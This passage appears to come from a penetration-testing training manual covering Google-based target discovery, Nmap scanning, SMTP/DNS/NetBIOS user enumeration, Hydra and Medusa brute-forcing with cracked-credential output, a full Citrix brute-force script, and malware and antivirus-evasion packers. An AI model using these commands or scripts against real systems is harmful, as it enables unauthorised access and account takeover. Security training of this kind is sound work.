35. 34 | P a g e
Finding Exploitable Vulnerable Web Systems by Signature
Choosing a public exploit:
36. 35 | P a g e
Finding the a vulnerable website
Finding a vulnerable machine as the exploitation target can be done by using Google to find
websites containing a similar long path or directory tree:
37. 36 | P a g e
Alternately, the vulnerable website can be found by using the “Powered by” signature of open
source projects:
38. 37 | P a g e
Verifying the vulnerability exists
39. 38 | P a g e
Exploiting the Vulnerability
Opening a free hosting account
47. 46 | P a g e
Scanning and Scanning Definition
The term scanning refers to the phase of discovering machines, protocols and ports existing in
an accessible computer network. Port Scanning is an art and a crucial part of the reconnaissance
process. Many junior information security personnel tend to make mistake during the scanning
process and do not discover certain machines and services, which results in vulnerabilities not
found and therefore not repaired.
The common scanning concept relies on the idea that a certain service is listening on a default
port number and by successfully connecting to that port number it is a reasonable to assume
that it is the expected service. In order to positively identify the true service listening on the port
scanners sends the “Hello Message” of all the known protocols in its database until it gets a
response in the same protocol.
The most famous scanner is Nmap, which has been developed since 1997 and supports
practically every known port scanning method. Two most common port scanning methods are
the SYN scan and Connect scan.
• Connect Scan: Nmap –PN –open –v –A –p1-65535 –sT <ip>
o Slower
o 100% Reliable (if you can connect than it is publicly open)
o Allows Inquiring the true underlying service
o Can be implemented using any programming language (even JavaScript)
• SYN Scan: Nmap –PN –open –v –A –p1-65535 –sS <ip>
o Fastest scanning method
o Sends only one packet for each port
o Requires a driver to be installed
o Might trigger a false alarm of a “SYN Flood” attack in *Firewalls/*IDS/*IPS
49. 48 | P a g e
Enumeration Overview of System Hacking Cycle
Enumerating the allowed HTTP Methods on a Web Server:
50. 49 | P a g e
Enumerating Usernames Using Google
Exposed Configuration Files
51. 50 | P a g e
Company Email Addresses:
In most cases, a user’s email address is also his username inside the company, especially when
Single Sign-On (SSO) is implemented.
52. 51 | P a g e
SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR)
Using the SMTP VRFY Command
It is possible to enumerate the existing users and email aliases using the official SMTP VRFY
request. It is possible to automate the process with a simple script/tool such as: “smtp-user-
enum.pl”.
The output below shows how the SMTP server responds differently to VRFY requests for valid and
invalid users. It is recommended that a manual check like the following is carried out before running
smtp-user-enum. Obviously the tool won't work if the server doesn't respond differently to requests
for valid and invalid users.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
VRFY no_such
550 no_such... User unknown
VRFY root
250 Super-User <root@myhost>
To use smtp-user-enum to enumerate valid usernames using the VRFY command, first
prepare a list of usernames (users.txt) and run the tool as follows:
$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used
53. 52 | P a g e
######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.
47 queries in 1 seconds (47.0 queries / sec)
It's worth noting that postmaster is not actually a valid OS-level user account - it's a mail
alias.
Using the SMTP EXPN Command
The output below shows how the SMTP server responds differently to EXPN requests for
valid and invalid users.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
EXPN no_such
550 no_such... User unknown
EXPN root
250 Super-User <root@myhost>
To use smtp-user-enum to enumerate valid usernames using the VRFY command, first
prepare a list of usernames (users.txt) and run the tool as follows (unsurprisingly, we get
the same results as above):
$ smtp-user-enum.pl -M EXPN -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )
54. 53 | P a g e
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... EXPN
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.
47 queries in 1 seconds (47.0 queries / sec)
Using the SMTP RCPT TO Command
The output below shows how the SMTP server responds differently to RCPT TO requests
for valid and invalid users. This is often to the most useful technique as VRFY and EXPN
are often disabled to prevent username enumeration.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:root
250 root... Sender ok
55. 54 | P a g e
RCPT TO: no_such
550 no_such... User unknown
RCPT TO:root
250 root... Recipient ok
Non Delivery Response (NDR)
Mail servers are friendly and attempt to provide users with the best service they can.
Therefore, when someone sends an email to a non-existing user, the mail server notifies
him that this user doesn’t exist, so he can correct his type error or call that person to get
his new account name.
To enumerate usernames using NDR, the attacker just sends an email to an account on a
certain domain, if the account exists the attacker gets no notification, if it doesn’t exist,
you will get a NDR email, saying this account doesn’t exist.
POP3 Enumeration
The Post Office Protocol (POP3) is used by users to read their emails. In order for a user
to get his mailbox contents, the server requires the user to identify in two sequential
steps. The first step the user sends the keyword “USER” followed by a space and his
username. At the second step the user sends the keyword “PASS” followed by a space
and his password in clear-text.
56. 55 | P a g e
Some POP3 servers were implemented in such a way that they reply with different error
messages when the user exists and a different one when he doesn’t. Let's select a
random list of names and passwords, connect to POP3 server with a telnet client of your
choice, and try to authenticate. Following is an example of a POP3 server listening on an
AS/400 machine:
57. 56 | P a g e
Private User Directories
Apache User Enumeration
http://www.example.com/~<username>
When a remote user makes a request for a possible user's default home page, the
server returns one of three responses:
• In a case where username is a valid user account, and has been configured with a
homepage, the server responds with the user's homepage.
• When username exists on the system, but has not been assigned a homepage
document, the server returns the message "You don't have permission to access
/~username on this server."
• If the tested username does not exist as an account on the system, the Apache
server's response includes the message "The requested URL /~username was not
found on this server." or refers to the default error page configured for this error.
For Example:
When the user doesn’t exit, it redirects to the website main page:
WordPress Authors Template User Enumeration Vulnerability
There are other places where you might be able to find some usernames. A good
example is WordPress author templates which allow you to extract usernames through
URLs with the following syntax: /wordpress/author/authorname/
i.e.:
58. 57 | P a g e
http://www.target-domain.com/wordpress/author/admin/
http://www.target-domain.com/wordpress/author/root/
A case when the user doesn’t exist:
A case when the user exists:
59. 58 | P a g e
FTP
CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd)
The Sun Solaris operating systems contains a built-in ftp server called “in.ftpd”. This FTP
server has classic user enumeration vulnerability. When a user is logged on to the
server, even with anonymous access, he can call the command CWD (Current Working
Directory) followed by a username.
The server will reply a different response if the user account exists and a different one if
it doesn’t. For Example:
“CWD ~root”
FTP Server Authentication Delay Username Enumeration Vulnerability
(Example: ProFTPD)
A timing attack exists in ProFTPD that could assist a remote user in enumerating
usernames. The analysis of the response time during authentication gives an attacker
indication as to whether or not the supplied username is valid.
The problem occurs due to altering execution paths when the daemon encounters a
valid, invalid or privileged username. A remote attacker can exploit this vulnerability to
determine what usernames are valid, privileged, or do not exist on the remote system.
When authentication attempt is sent to the FTP server, it will respond slowly if the
username exists and faster if it doesn’t.
Telnet
Telnet Server User Field Account Enumeration (Example: Cisco Aironet)
A flaw was discovered in the firmware of Cisco Aironet AP1100 Valid version 12.2. The
flaw allows a malicious remote user to discover which accounts are valid on the targeted
Cisco Aironet Access Point by submitting a user name as the first parameter.
If the account exists the attacker will be then prompted for the password.
If not, the server will reply with the message: ""% Login invalid", revealing the account
doesn’t exist.
Web Server Pre-Login – HTTP Response based enumeration (Example:
Lotus Domini)
60. 59 | P a g e
An issue was reported in Lotus Domino server (“Lotus Domino Username Enumeration
Vulnerability”), which could allow for remote users to determine the validity of a
username existing on a host.
When a remote user submits a GET request for a possible user's account, the server
response assists the user in determining the validity of the username submitted. If the
submitted username is valid, the server replies with an HTTP 200 OK message and the
login screen.
Alternatively, when the submitted username is not valid (meaning that it does not exist
on the system), the server responds with a 404 File not Found message. Because the
server responds differently depending on whether or not the username is valid, an
attacker user can test and enumerate possible usernames.
Error Message User Enumeration:
Most systems developed in the last decade are web applications. Most of these application
require a user login mechanism which is being developed by the companies themselves. As
secure development is not taught in Universities in the common Computer Science and
Software Engineering degrees, most developers, make the same common mistakes when
developing login mechanism.
The most common mistakes are the application replying different error messages when the user
account exists and a different when it doesn’t. For Example:
• System Registration Error Message User Enumeration
o Sorry, there is already an account registered with the same email address.
• System Login Error Message User Enumeration
o Authentication failure: entered username does not exist.
o Authentication failure: incorrect password entered.
• System “Forget Password” Error/Success Message User Enumeration
o Sorry, the email address entered does not exist.
o A new password has been sent to your email address.
NetBIOS User Enumeration
The LSA (Local Security Authority) server on every Windows machine is the service which
handles the user login and determines the access levels each user gets to the system objects
when he connects to system services such as RPC, WMI, Remote Desktop and NetBIOS.
61. 60 | P a g e
In every Windows Server 2003 and prior, This “RestrictAnonymous” setting is configured by
default to allow unauthenticated users to retrieve information regarding any/all local/domain
users (RestrictAnonymous=0). This setting allows an attacker to connect to the server using no
username and password.
For Example by using: ‘cmd /c net use domain_server /user:”” “”’ or by using the common
NetBIOS user enumeration tool written by SecurityFriday, “GetAcct”:
It is also possible to use the tool Winfingerprint and obtain information from all common
services exposed by a local server on the network:
64. 63 | P a g e
GFI Languard
SNMP Enumeration
It is possible to obtain the system information about the remote host by sending SNMP requests
with a remotely existing “OID” (Object ID) such as 1.3.6.1.2.1.1.1. An attacker may use this
information to gain more knowledge about the target host.
An attacker is able to remotely discover the machines usernames, IPs connected to the machine,
MAC addresses, internal IPs, gateways, DNS servers (which can be used for fast DNS in order to
take over the internal network). The attacker also knows the exact model and firmware version
to this machine and can use it to create reliable exploit.
An Example of a remote SNMP Enumeration:
65. 64 | P a g e
DNS Enumeration
A penetration test project beings in collecting information and mapping all the remotely
accessible organization’s servers. The Domain Name Server can be used to extract some
of the existing subdomains and discover more IPs, with different server types, from Web
Servers to Firewalls, VPNs and Citrix Servers.
The DNS sub domains can be enumerated by using a dictionary of common sub domain
names such as “mail”, “webmail”, “vpn”, “backoffice”, “fw” and etc…
In order to find customized sub domain names, an attacker must run a full remote brute
force attack and is likely to disclose all subdomains names from 1 to 8 characters length
with letters and numbers. Since the DNS protocols is UDP based, the brute force attack
faster than most other network brute force attack.
66. 65 | P a g e
Dictionary Based DNS Enumeration
Brute Forcing DNS Sub-Domains
67. 66 | P a g e
VoIP User Enumeration
Most currently deployed VoIP servers are using SIP (Session Initiation Protocol) server
implementations, which are very similar to HTTP. In order to authenticate using the SIP
protocol, the remote user must specify the extension name to log into. Then the user is
required to submit his username and password, where in most cases the extension
number is also the username.
Several VoIP systems start the first extension number from 100 and set the default
password of all extensions to the extension number. This means that for some VoIP
servers, the default user names and passwords will be 100:100, 101:101 and etc…
Enumerating Extensions:
Enumerate Usernames: (Example: Inter Asterisk Exchange protocol)
68. 67 | P a g e
Citrix Published Applications Remote Enumeration
It is possible to use several tools such as:
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-scan.c
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-proxy.pl
The Citrix Application Enumeration script can be used as follows:
#. /citrix-pa-scan 212.123.69.1
Citrix Published Application Scanner version 1.0 By Ian Vitek, ian.vitek@ixsecurity.com
212.123.69.1: Found Applications:
Printer Config
Admin Desktop
i-desktop
It is also possible to use Nmap or MetaSploit to enumerate the applications published by a Citrix
Server:
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
69. 68 | P a g e
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/gather/citrix_published_bruteforce
msf auxiliary(citrix_published_bruteforce) > set RHOST [TARGET IP]
msf auxiliary(citrix_published_bruteforce) > run
Once found, an application can be manually added to the local ICA client:
70. 69 | P a g e
System Hacking Part 1- Cracking Password
Brute Forcing Passwords – Telnet:
Cracking Accounts Using Hydra
Using the tool Hydra by THC (The Hacker’s Choice), it is possible to remotely and reliably crack
accounts of almost every commonly used system.
Hydra supports cracking accounts in all the following protocols: imap, imap-ntlm, smb smbnt,
http/https-{head|get|post|post-form}, http-proxy, cisco (telnet), cisco-enable (telnet), vnc,
ldap2, ldap3, mssql, mysql, oracle-listener, postgres, nntp, socks5, rexec, rlogin, pcnfs, snmp,
rsh, cvs, svn, icq, sapr3, ssh2, smtp-auth, smtp-auth-ntlm, pcanywhere, teamspeak, sip, vmauthd
hydra.exe -L "usernames.txt" -P "passwords.txt" -e ns -o cracked_smbs.txt
<any_domain_connected_machine> smb
Example:
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-11-07 17:16:06
[DATA] 1 tasks, 1 servers, 4652972 login tries (l: 11026/p: 422), ~4652972 tries per task
[DATA] attacking service smb on port 139
71. 70 | P a g e
[STATUS] 8332.00 tries/min, 8332 tries in 00:01h, 4644640 to do in 09:18h
[STATUS] 7643.33 tries/min, 22930 tries in 00:03h, 4630042 to do in 10:06h
[STATUS] 7530.43 tries/min, 52713 tries in 00:07h, 4600259 to do in 10:11h
[139][smb] host: 10.205.200.206 login: PRAVNER password: 12345
[139][smb] host: 10.205.200.206 login: ZORIK password: 12345
[139][smb] host: 10.205.200.206 login: COHSIGAL password: 123456
[139][smb] host: 10.205.200.206 login: INADRIAN password: 123456
[139][smb] host: 10.205.200.206 login: Guest password: Guest
[139][smb] host: 10.205.200.206 login: MLSHOSHANA password: 12345
[139][smb] host: 10.205.200.206 login: MEETING_ROOM password: 12345
[STATUS] 7803.07 tries/min, 117046 tries in 00:15h, 4535926 to do in 09:42h
[139][smb] host: 10.205.200.206 login: SHIL password: 22222
[139][smb] host: 10.205.200.206 login: NTRFAX password: NTRFAX
[139][smb] host: 10.205.200.206 login: EZORLY password: 22222
[139][smb] host: 10.205.200.206 login: anonymous password: anonymous
[139][smb] host: 10.205.200.206 login: INFO password: 12345
[139][smb] host: 10.205.200.206 login: NTJERPDC password: NTJERPDC
[STATUS] 8046.32 tries/min, 249436 tries in 00:31h, 4403536 to do in 09:08h
[139][smb] host: 10.205.200.206 login: GRMINA password: 123456
[139][smb] host: 10.205.200.206 login: BRSHUKI password: 123456
[139][smb] host: 10.205.200.206 login: KZADINA password: 123456
[139][smb] host: 10.205.200.206 login: SPOFER password: 123456
[STATUS] 8254.85 tries/min, 387978 tries in 00:47h, 4264994 to do in 08:37h
[139][smb] host: 10.205.200.206 login: ALROZE password: 123456
[139][smb] host: 10.205.200.206 login: CHYULI password: 12345
Cracking Accounts Using Medusa:
Medusa is very much like Hydra, it supports the following protocols: AFP, CVS, FTP,
HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL,
REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN),
Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form
Here is an example of usage and results:
% medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt
Medusa v1.0-rc1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: (1/7)
72. 71 | P a g e
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass2 (5/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass3 (6/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass4 (7/7)
Brute Forcing Check Point Client Authentication Remote Service
The Check Point web Client Authentication Remote Service is just a simple HTML based
authentication form, easily attacked with a common web brute force tool such as Hydra,
Medusa, Crowbar and etc…
The login page was displayed at the enumeration section. The result of a successful login
attempt into a default user in Check Point Firewall looks like this:
Brute Forcing Citrix ICA Servers
73. 72 | P a g e
The hacker pdp from GNUCITIZEN.org wrote a Citrix Brute Force tool (I guess this was the first
public one and for now seems to be the only) which uses the “Citrix.ICAClient” COM Object to
manipulate the local Citrix client to make the login attacks. The code is a local JavaScript code
running under “Windows Script Host”.
var actns = [];
var pairs = [];
var parms = {};
var util = this;
var usernames = [];
var passwords = [];
var timeout = 5000;
if (WScript.Arguments.length < 3) {
WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
WScript.Echo(' ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2');
WScript.Echo(' ' + WScript.ScriptName + ' HTTPBrowserAddress=172.16.3.191 userfile=file.txt passfile=file.txt');
WScript.Echo(' ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2 timeout=5000');
WScript.Echo('');
WScript.Echo('CITRIX Login Bruteforce Utility');
WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
WScript.Quit(1);
}
var try_out = WScript.CreateObject('Citrix.ICAClient');
for (var i = 0; i < WScript.Arguments.length; i++) {
var arg = WScript.Arguments(i);
var tkn = arg.split('=');
try {
var name = tkn[0].replace(/^s+|s+$/g, '');
var value = tkn[1].replace(/^s+|s+$/g, '');
switch (name) {
case 'timeout':
try {
timeout = int(value);
} catch (e) {
74. 73 | P a g e
WScript.Echo("option 'timeout' must be an integer value");
}
break;
case 'usernames':
var items = value.split(',');
for (var z = 0; z < items.length; z++) {
usernames.push(items[z].replace(/^s+|s+$/g, ''));
}
break;
case 'passwords':
var items = value.split(',');
for (var z = 0; z < items.length; z++) {
passwords.push(items[z].replace(/^s+|s+$/g, ''));
}
break;
case 'userfile':
try {
var fso = WScript.CreateObject('Scripting.FileSystemObject');
var f = fso.OpenTextFile(value, 1);
while (!f.AtEndOfStream) {
var line = f.ReadLine();
usernames.push(line.replace(/^s+|s+$/g, ''));
}
f.Close();
} catch (e) {
WScript.Echo(e.message);
WScript.Quit(1);
}
break;
case 'passfile':
try {
var fso = WScript.CreateObject('Scripting.FileSystemObject');
var f = fso.OpenTextFile(value, 1);
while (!f.AtEndOfStream) {
var line = f.ReadLine();
passwords.push(line.replace(/^s+|s+$/g, ''));
}
f.Close();
} catch (e) {
WScript.Echo(e.message);
WScript.Quit(1);
}
break;
default:
try_out.SetProp(name, value);
parms[name] = value;
75. 74 | P a g e
}
} catch (e) {
WScript.Echo("option '" + arg + "' not recognized");
WScript.Quit(1);
}
}
}
function frap(f) {
var a = [];
for (var i = 1; i < arguments.length; i++) {
a.push(arguments[i]);
}
return function () {
f.apply(f, a);
};
}
for (var i = 0; i < usernames.length; i++) {
for (var z = 0; z < passwords.length; z++) {
pairs.push([usernames[i], passwords[z]]);
}
}
for (var i = 0; i < pairs.length; i++) {
actns.push(frap(function (i) {
util['_cls' + i] = WScript.CreateObject('Citrix.ICAClient', '_ica' + i);
util['_ica' + i + 'OnLogon'] = frap(function (i) {
WScript.Echo(pairs[i]);
util['_cls' + i].Disconnect();
}, i);
for (var z in parms) {
util['_cls' + i].setProp(z, parms[z]);
}
util['_cls' + i].setProp('UserName', pairs[i][0]);
util['_cls' + i].setProp('Password', pairs[i][1]);
util['_cls' + i].setProp('Launch', 'TRUE');
util['_cls' + i].Connect();
actns.push(frap(function (i) {
util['_cls' + i].Disconnect();
}, i));
}, i));
}
while(1) {
var action = actns.pop();
if (action) {
action();
} else {
WScript.Quit(0);
76. 75 | P a g e
}
WScript.Sleep(timeout);
}
pdp also wrote a script to use Citrix legitimately, after a user and a password were obtained:
var client = WScript.CreateObject('Citrix.ICAClient');
if (WScript.Arguments.length == 0) {
WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
WScript.Echo(' ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 Application=Notepad');
WScript.Echo('');
WScript.Echo('CITRIX Client Utility');
WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
WScript.Quit(1);
} else {
for (var i = 0; i < WScript.Arguments.length; i++) {
var arg = WScript.Arguments(i);
var tkn = arg.split('=');
try {
var name = tkn[0].replace(/^s+|s+$/g, '');
var value = tkn[1].replace(/^s+|s+$/g, '');
client[name] = value;
} catch (e) {
WScript.Echo("option '" + arg + "' not recognized");
WScript.Quit(1);
}
}
}
try {
client.Launch = "TRUE";
client.Connect();
} catch (e) {
WScript.Echo(e);
}
77. 76 | P a g e
Trojans and Backdoors Effect on Business
In this section we will cover the most common malware in the world, what it does, how it works
and how it affects the world’s computer industry and the economy. The types of malware to be
covered:
Dialers
FraudWare
Keyloggers
Spyware & Browser Trojans
Trojans
Password Stealers
RansomWare
Network Shares/Local Replicating Viruses
Worms
The following is according to a research made by the Ponemon Institute:
We see that cybercrime damage had costs 45 companies about 52 billion dollars in every year.
Here we can see that 80% of attacks result in a Trojan, Backdoor, Worm or Virus being installed.
78. 77 | P a g e
Auto Dialers
Mutes the modem’s speaker
Automatically calling 1-900 numbers on your behalf
You are being charged between $1 to $20 or more per minute.
At the end of the month it usually ends with a sum greater than 5000$
Anti-Viruses don’t supply a generic way to stop these viruses, we do not let any software
create and dial connections.
FraudWare
A fake “Anti-Spyware” or “Anti-Virus” product
Has a GUI, looks the same as a genuine AV
Installs some applications on your computer to scare you, for example a red desktop
background with pirate skull and a popup with “Virus Found, pay to purchase license
and remove it”
Known signatures by AVs treat is as “Not.a.virus.fraudware” and do nothing
79. 78 | P a g e
It may self-update to a real unknown virus
Keylogger
Divides to 2 types:
▪ User mode
▪ SetWindowHooksEx
▪ GetAsyncKeyState
▪ Code Example: http://www.rootkit.com/newsread.php?newsid=346
▪ Uncaught Example: Keylogger Running Under Kaspersky 2009
▪ Kernel Mode
▪ A smart driver sitting as low as physically contacting your keyboard
▪ Most of them are undetectable and once ran, can shut down and delete
any Anti-Virus
▪ Code Example:
http://www.woodmann.com/forum/attachment.php?attachmentid=10
84&d=1093991813
80. 79 | P a g e
▪ 99% uncaught
How can we differentiate between a Keylogger and a computer game?
Spyware & Browser Trojans
Integrates itself to your browser
Tracks browsing/buying preferences
Steals account passwords
Bypasses firewalls as it is injecting “image requests” into active user initiated
connections to “safe websites“
Caught based on signatures and URL blacklists which are modified every day
Trojans
Integrates itself into your system to stealthily run on each boot
Opens a shell or connects back to the attacker for a live session or to retrieve
“commands”
Some are integrated with a password stealer and a Keylogger
A famous Trojan is: “SubSeven”
Easy to write, hard to “detect” as it does the same actions legitimate software does (e.g
Skype)
Password Stealers
Most run once and “suicides”, others may Integrate itself into
your system to stealthily run on each boot
Some also have an integrated Keylogger
81. 80 | P a g e
Steal passwords saved by clients and typed into clients at runtime. (e.g. dialup, email, IE,
MSN, YMSN, ICQ/AOL, Oracle, FTP passwords)
A famous Russian Password Stealer: “Pinch!”
Easy to write, almost impossible to detect as malicious, “it just reads local non-
document files and a few non-system registry entries”, “perhaps it’s a password
manager?”)
RansomWare
RansomWare typically propagates as a conventional computer worm, entering a system
through, for example, vulnerability in a network service or an e-mail attachment. It may then:
Disable an essential system service or lock the display at system startup.
Encrypt some of the user's personal files. Encrypting RansomWare was
originally referred to as crypto-viruses, crypto-Trojans or crypto-worms.
In both cases, the malware may extort by:
Prompting the user to enter a code obtainable only after wiring payment to the attacker
or sending an SMS message and accruing a charge.
Urging the user to buy a decryption or removal tool.
More sophisticated RansomWare may hybrid-encrypt the victim's plaintext with a
random symmetric key and a fixed public key. The malware author is the only party that knows
the needed private decryption key. The author who carries out this crypto-viral extortion attack
offers to recover the symmetric key for a fee.
A famous example: “Gpcode”, an RSA 1024BIT encryption, Kaspersky Anti-Virus labs
requested help from the community in order to reach 15 million computers, running for
about a year, to crack one variant’s key
How can such software be detected?! This is an everlasting logical vulnerability. It just
reads local files and deletes local files. The Anti-Virus model does not cover file deletion
or file reading…
83. 82 | P a g e
Viruses and Worms Virus History
Viruses and Worms are the living diseases of computers. They are the only type of software
which actually breeds itself and can even mutate completely automatically. There is no doubt
that some of the largest damages of all time made to economy were due to worms breakouts.
Looking at the research done by the Ponemon Institute clearly proves the point.
Local Replicating Viruses
These are the old fashioned “DOS days”, well known “viruses” which infect all the
applications in the system in order to spread and survive Anti-Virus removal attempts
Since Windows 95, these viruses also replicate themselves into Writable Network Shares
and to restricted ones using the logged on user credentials
This virus model was almost instinct until 2004 where it was combined with spreading
through P2P file sharing by
The famous “W32/Netsky.c@MM” replicated itself into the KaZaA” shared folder with
attractive names such as “Microsoft WinXP Crack.exe“
84. 83 | P a g e
As the virus industry is now financially motivated, latest Trojans infect non-built-in
startup applications to load on boot without changing the system configuration or files,
only the applications whose integrity is not verified.
Worms
The term defines a virus with non-local, wide-spread virus propagation techniques
Began in Windows 95 with Microsoft Office “Macros” (famous Melissa) until 2002
where macros were disabled by default with its cousin, the “Mass-Mailing”
(famous “I Love You”) worms which are still at the top
The new generation started in 2003 with “W32.Blaster” followed by “W32.Sasser” and
many others
These are the really money making and industry shaping viruses who conquers the
world in less than a week
Today since there are Firewalls, these worms are spread in combination with browser
and email client infections in order to penetrate networks and use 0-Day exploits such
as the unbelievable MS08-067
Antivirus
Anti-Virus is software installed on a computer endpoint or a computer network content gateway
(Web, Email…). Its purpose is detecting and removing different malicious code from the viruses
and worms family up to Trojans and key-loggers.
Anti-Viruses have three main operation methods:
1. Signature Based (Black-List) – inspecting any accessed content and comparing strings
and code sequences from the disk and the computer’s memory against a preinstalled
signature database.
2. Heuristic Based (Patterns) – Inspecting the behavior of software in order to find patterns
similar to those of known general/generic malicious code. The inspection usually follows
focuses on:
a) Sequence of calls to different operating system functions
b) Creating file types with incorrect file extensions in unconventional paths
85. 84 | P a g e
c) Applications permissions request such as accessing the memory space of other
applications
d) Writing into/over a large amount of enclosed/pre-compiled files such as executable
files.
3. Sandbox – Running applications “In Space“, in a closed environment where it is possible
to inspect all that the application is about to do, without it actually being able to harm
the machine or make any changes to it.
Packers/Crypters – Bypassing Anti-Viruses
Executable compression is any means of compressing an executable file and combining the
compressed data with decompression code into a single executable. When this compressed
executable is executed, the decompression code recreates the original code from the
compressed code before executing it. In most cases this happens transparently so the
compressed executable can be used in the exact same way as the original.
A compressed executable can be considered a self-extracting archive, where compressed data is
packaged along with the relevant decompression code in an executable file. Some compressed
executable can be decompressed to reconstruct the original executable without directly
executing it.
Originally executable compression was created in order to optimize the size on the disk
executable files, especially for the download of setup installations via the internet. Later on,
packing was used by software vendors in order to protect their software from reverse
engineering, therefore protecting patents, trade secrets and preventing the cracking of the
licensing mechanism.
Today executable compressors, aka “Packers” are used mostly by hackers and virus writers in
order to bypass antiviruses and pass known (black-listed) malware through them. There are
several types of packers/Crypters which are in common use:
1. Executable Compressor
a) UPX
2. Traditional Executable Packer
a) ASPack (Stolen API Bytes)
b) ASProtect
c) Stealth EXE Protector
3. Memory Protector (User Mode)
a) Silicon Realms Armadillo (CopyMem II, Debug blocker, Nanomites)
b) PESpin (Debug blocker)
86. 85 | P a g e
4. Memory Protector (Kernel Mode)
a) Extreme Protector
b) Obsidium
5. Virtual Machine (With a virtual processor different CPU])
a) TheMida
b) VMProtect
c) MoleBox
6. Almost Unfeasibly bypass-able
a) StarForce FrontLine ProActive
Netcat - Original – Less Then Packed
Bypassing Antivirus – Netcat * MEW